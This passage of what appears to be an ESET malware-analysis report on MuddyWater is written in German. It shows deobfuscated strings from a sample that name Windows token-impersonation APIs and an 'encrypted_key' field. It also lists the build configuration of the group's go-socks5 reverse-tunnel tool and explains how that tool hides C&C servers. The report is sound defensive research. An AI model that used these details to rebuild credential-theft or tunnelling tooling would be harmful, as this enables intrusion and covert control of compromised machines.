gdGlog}o{eRwjpw&"encrypted_key":FAe[{hy|b-vcJvxGImpersonateLoggeh}gdOvlgt_NxuoolOpenProcessTokenVLUKKW'xxqjpwe}uDuplicateTokenExs5&}vl{tiplh|io|eIpuvvkdXznx(Gh}n2(sh|y⌂ryme~ds~

Das Entfernen der Junk-Zeichen und das Aufteilen der Zeichenketten ergibt:

• "encrypted_key":
• ImpersonateLogge
• OpenProcessToken
• DuplicateTokenEx

go-socks5 Reverse-Tunnel

Die go-socks5-Reverse-Tunnel von MuddyWater sind eine Sammlung von Go-kompilierten Werkzeugen, die auf öffentlich verfügbaren Bibliotheken wie go-socks5, yamux und resocks basieren. Sie wurden in den letzten Kampagnen von MuddyWater häufig eingesetzt.

Die meisten der von uns analysierten Varianten scheinen intern den Namen ESETGO (ohne Bezug zu ESET) zu tragen, basierend auf den in Abbildung 9 und in anderen Artefakten gezeigten Build-Konfigurationsstrings.

path  ESETGO
mod   ESETGO	(devel)
dep   github.com/armon/go-socks5	v0.0.0-20160902184237-e75332964ef5h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=
dep	  github.com/hashicorp/yamux	v0.1.1	h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=
dep	  golang.org/x/net	v0.29.0	h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=
dep	  golang.org/x/sys	v0.25.0	h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=
build -buildmode=exe
build -compiler=gc
build -ldflags="-w -s"
build CGO_ENABLED=1
build CGO_CFLAGS=
build CGO_CPPFLAGS=
build CGO_CXXFLAGS=
build CGO_LDFLAGS=
build GOARCH=amd64
build GOOS=windows
build GOAMD64=v1

Abbildung 9. Build-Konfigurationsstrings der go-socks5-Varianten von MuddyWater

Der Hauptzweck des go-socks5-Proxys von MuddyWater besteht darin, die Kommunikation zwischen dem kompromittierten Rechner (an einem bestimmten Port) und einem fest codierten C&C-Server weiterzuleiten, wobei ein fest codierter Verbindungsschlüssel zur Authentifizierung mit dem C&C-Server über SSL/TLS verwendet wird. Auf diese Weise kann der Angreifer den C&C-Verkehr (der möglicherweise mit anderen Kompromittierungen zusammenhängt) über den kompromittierten Rechner leiten und so den Standort des echten C&C-Servers verbergen.

Schlussfolgerung

Diese Kampagne zeigt, dass MuddyWater immer ausgereifter wird. Der Einsatz von bisher undokumentierten Komponenten - wie dem Fooder-Loader und der MuddyViper-Backdoor - deutet auf das Bestreben hin, die Stealth-, Persistenz- und Credential Harvesting-Fähigkeiten zu verbessern. Der Einsatz von spielerisch inspirierten Umgehungstechniken, Reverse-Tunneling und ein breit gefächertes Toolset spiegeln einen raffinierteren Ansatz als bei früheren Kampagnen wider, auch wenn Spuren der operativen Unreife der Gruppe bestehen bleiben.

MuddyWater beweist weiterhin die Fähigkeit, durchschnittliche bis überdurchschnittliche Kampagnen durchzuführen, d.h. sie sind zeitnah, effektiv und zunehmend schwieriger zu bekämpfen. Wir gehen davon aus, dass MuddyWater ein führender Akteur bei Aktivitäten im Zusammenhang mit dem Iran bleiben wird, erwarten aber, dass die typischen Kampagnen mit fortschrittlicheren TTPs fortgesetzt werden.

ESET wird die Aktivitäten der Gruppe weiterhin beobachten und sich dabei auf weitere Anzeichen für technische Fortschritte und strategische Ziele in den Bereichen Regierung, Militär, Telekommunikation und kritische Infrastruktur konzentrieren.

Wenn Sie Fragen zu unseren auf WeLiveSecurity veröffentlichten Untersuchungen haben, kontaktieren Sie uns bitte unter threatintel@eset.com.

ESET Research bietet private APT Intelligence Reports und Datenfeeds an. Wenn Sie Fragen zu diesem Service haben, besuchen Sie die ESET Threat Intelligence Seite.

IoCs

Dateien

Netzwerk

MITRE ATT&CK-Techniken

Diese Tabelle wurde mit der Version 17 des MITRE ATT&CK Frameworks erstellt.